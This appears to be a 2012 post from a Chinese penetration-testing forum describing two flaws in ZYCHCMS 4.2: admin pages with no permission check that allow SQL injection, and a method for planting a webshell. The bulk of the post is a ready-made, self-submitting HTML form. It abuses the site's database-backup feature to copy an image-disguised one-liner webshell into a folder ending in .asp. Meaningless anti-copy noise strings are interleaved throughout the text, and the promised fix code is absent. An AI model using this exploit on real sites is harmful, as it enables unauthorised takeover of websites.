中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
6 u% C$ H$ a5 d
8 F8 D. m( b- N( R' D% c D
+ d8 J4 i- r1 c) {) x
5 J" c- Q3 E# I3 W w
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
' P; U7 u3 S2 ]7 ~/ i, r3 A4 S
①SQL注射漏洞
4 U* B1 a& [$ a; E* O
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
+ Z: v* n8 R8 W' I- I$ J
漏洞原因:未过滤
9 p, {) h4 ~" N! t! ^5 x" A; I
漏洞代码:
+ E V' C- O2 \* a1 Q
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
% Z0 Y4 u1 n$ d3 ?# e$ W
修复方法:在文件开头加入代码
( a1 _' A P q/ r& b3 `* h Y* Q
7 j: N2 s( @! y V9 [0 ]
- X- |& @# z1 N
②后台拿WBSHELL
3 q/ h1 n/ c0 @" e$ d: @
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 H, s6 ?9 X% i3 I1 ` C
这里在网上找了一个,改了下,将就着用。
; j' Q$ E2 n1 V4 D7 [ d
以下是代码本地提交代码
/ s) j, |4 Z# J8 _
9 w) X F. k1 H. X
+ q, p5 B# X& ^
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
, d9 |7 `$ x- w( B
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
5 ~+ Z$ y7 c9 u3 ?$ ^
<tr>
# I0 N1 p, T5 z2 I
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
5 f* D/ c9 f* W
</tr>
7 }: H0 H: N* A% ~3 ^# p$ X/ b" I
<tr>
$ `: I# T9 R4 [7 R; m5 c0 z; N
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
$ l8 b; |9 V: q2 m2 J7 e$ t: p
</span>
) U. c; ^/ f5 [
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
- L! v6 @# v2 _1 ?5 J
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
" {+ m1 h# A- h) f! S; c B
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
$ `' Z5 b8 A5 Z+ t4 N/ u" ?
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
" m* T' z- @' Q& i
<div align=”left”>
" o) t+ u4 z: M2 z/ k& @# z
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
6 e2 C1 B4 ]* E1 _0 h+ p. X- j
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
7 t4 z/ ?/ Q. b! N
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
* {. q) Y9 u2 R# H Z
</div></td>
3 X0 t+ z8 {0 p9 C* f ?
</tr>
& T0 [# V/ w/ V# Y
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
% Q! n( F2 g) e. c6 c
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
! a5 v) ]- h8 r7 }3 G9 D
<td class=”td”><div align=”left”>
. W# O: N2 G, `+ K4 G& _1 E7 E
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
& K' r$ m( Y6 }4 h: x, a" P
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
% e/ q7 `/ _ v; K; v
</tr>
7 j3 O; f; O1 T+ l2 u
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
% t; |0 Z! k% k7 Y) L& ^
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
+ T8 v3 `8 r- G9 G4 i9 n5 [
<td class=”td”><div align=”left”>
- a' g# Z! f: e4 }2 m5 n2 p( |
<input type=”submit” value=”确定备份” class=”btn”
4 ]$ l$ m$ M8 y G5 ]& d' m
</div></td>
' Q# S/ j/ w: w8 S- }& s
</tr>
, |* a% C& k1 o: v, f h
</table></td></tr></form>
% q+ w E; L; j# S0 N J
</table>
' f U3 b* T, D9 v
</td>
/ C% p9 \ Y% |3 V4 u! s! N: U
</tr>
3 w0 S- I5 R) ]: ?1 ]: V
</table>
& Q/ p' F& g/ c- |0 G' t6 K2 L( q
<script>
' w+ v0 @! G. t; R0 D2 E
document.all.add.submit();
, p( S: a+ o7 ]
</script>
4 r' ^& Q/ B) t9 v& Q% L) ~3 X3 u
- d9 K% R; |4 s( p X, u' O: z
$ j: ]' R$ H! U' o m3 F' F7 k
6 I/ g- ?" M5 Z# s4 l
# X1 M' E5 b3 w% G" _
& s" h! P) ~. @
- X- \7 H& }" |% f
/ y9 e) Y' n3 q2 d3 p
) o6 T+ c b0 f3 K" B/ f
3 G- j2 M2 ~. t9 }- ]) X
. w/ _8 Z3 h& C" [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2